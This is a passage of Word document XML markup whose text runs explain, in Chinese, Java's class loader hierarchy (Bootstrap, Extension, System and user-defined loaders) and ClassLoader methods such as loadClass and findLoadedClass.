        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>完成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$JAVA_HOME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jre/lib/rt.jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sun JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的实现）中所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>文件的加载，这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中包含了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>规范定义的所有接口以及实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Extension ClassLoader</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Fonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>用此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来加载扩展功能的一些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>包。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System ClassLoader</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Fonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>用此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来加载启动参数中指定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Classpath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>包以及目录，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sun JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对应的类名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AppClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User-Defined ClassLoader</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Fonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User-DefinedClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>开发人员继承</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>抽象类自行实现的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，基于自定义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>可用于加载非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Classpath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>以及目录。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </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Style w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>抽象类的几个关键方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="601"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>loadClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>此方法负责加载指定名字的类，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的实现方法为先从已经加载的类中寻找，如没有则继续从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>parent ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中寻找，如仍然没找到，则从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中寻找，最后再调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>findClass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法来寻找，如要改变类的加载顺序，则可覆盖此方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="601"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>findLoadedClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>此方法负责从当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实例对象的缓存中寻找已加载的类，调用的为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的方法。</w:t>
      </w:r>
    </w:p>
